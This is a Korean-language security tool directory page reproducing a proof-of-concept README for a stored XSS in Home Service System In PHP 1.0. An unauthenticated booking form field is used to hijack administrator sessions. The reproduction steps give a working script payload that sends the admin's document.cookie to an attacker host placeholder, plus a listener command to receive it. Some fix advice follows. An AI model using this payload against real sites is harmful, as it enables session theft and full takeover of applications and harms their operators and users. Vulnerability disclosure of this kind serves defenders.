Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-7089-XSS — # CVE-2026-7089 개념 증명 — Home Service System PHP 1.0의 저장형 XSS로, 예약 양식을 통한 인증되지 않은 관리자 세션 하이재킹을 허용합니다. | Kitploit
도구/GitHubGitHub/xmyronn/cve-2026-7089-xss
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

# CVE-2026-7089 개념 증명 — Home Service System PHP 1.0의 저장형 XSS로, 예약 양식을 통한 인증되지 않은 관리자 세션 하이재킹을 허용합니다.

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

home-service-system-unauth-stored-xss-admin-takeover

취약점 세부 정보

필드세부 정보
공급업체code-projects.org
제품Home Service System In PHP
버전1.0
취약점 유형저장형 크로스 사이트 스크립팅 (XSS)
CWECWE-79
인증 필요 여부아니요
작성자Imad Alvi

설명

Home Service System In PHP 1.0의 booking.php 파일에 저장형 크로스 사이트 스크립팅(XSS) 취약점이 존재합니다. 인증되지 않은 사용자는 예약 양식 필드를 통해 악성 JavaScript 페이로드를 주입할 수 있습니다. 삭제되지 않은 입력은 데이터베이스에 저장되며 관리자 패널(admin.php)에서 출력 인코딩 없이 렌더링되어 관리자의 브라우저 컨텍스트에서 실행됩니다.

이를 통해 인증되지 않은 공격자가 관리자 세션 쿠키를 탈취하고, 관리자를 대신하여 작업을 수행하거나, 관리자 계정을 완전히 장악할 수 있습니다.


영향을 받는 구성 요소

  • 파일: booking.php
  • 매개변수: fname, lname
  • 싱크(Sink): admin.php → 예약 관리

재현 단계

  1. 인증되지 않은 사용자로 예약 페이지에 접속합니다: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. 이름(First Name) 필드에 다음 페이로드를 주입합니다:

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. 나머지 필드를 유효한 데이터로 채우고 예약을 제출합니다.

  2. 공격자 머신에서 리스너를 시작합니다:

root@kitploit:~
php -S 0.0.0.0:PORT
  1. 관리자가 admin.php의 예약 관리 섹션을 방문할 때까지 기다립니다.

  2. 페이로드가 관리자의 브라우저에서 실행되어 세션 쿠키를 리스너로 유출합니다.

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

개념 증명

페이로드 (알림)

root@kitploit:~
<script>alert(1)</script>
Screenshot 2026-04-08 220538

페이로드 (세션 하이재킹)

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

영향

이 취약점으로 인해 원격의 인증되지 않은 공격자가 애플리케이션을 완전히 장악할 수 있습니다.

공격자는 다음을 수행할 수 있습니다:

  • 관리자 브라우저에서 임의의 JavaScript 실행
  • 관리자의 PHPSESSID 세션 쿠키 탈취
  • 관리자 세션을 하이재킹하여 전체 관리자 권한 획득
  • 모든 관리 작업 수행 (예약, 제공업체 관리 등)

이는 애플리케이션의 완전한 장악으로 이어집니다.

해결 방안

  • 저장 또는 렌더링 전에 모든 사용자 입력에 ENT_QUOTES와 함께 htmlspecialchars() 적용
  • 콘텐츠 보안 정책(CSP) 헤더 구현
  • 모든 양식 입력을 서버 측에서 검증 및 삭제

참고 자료

  • Home Service System In PHP - code-projects.org
도구 다운로드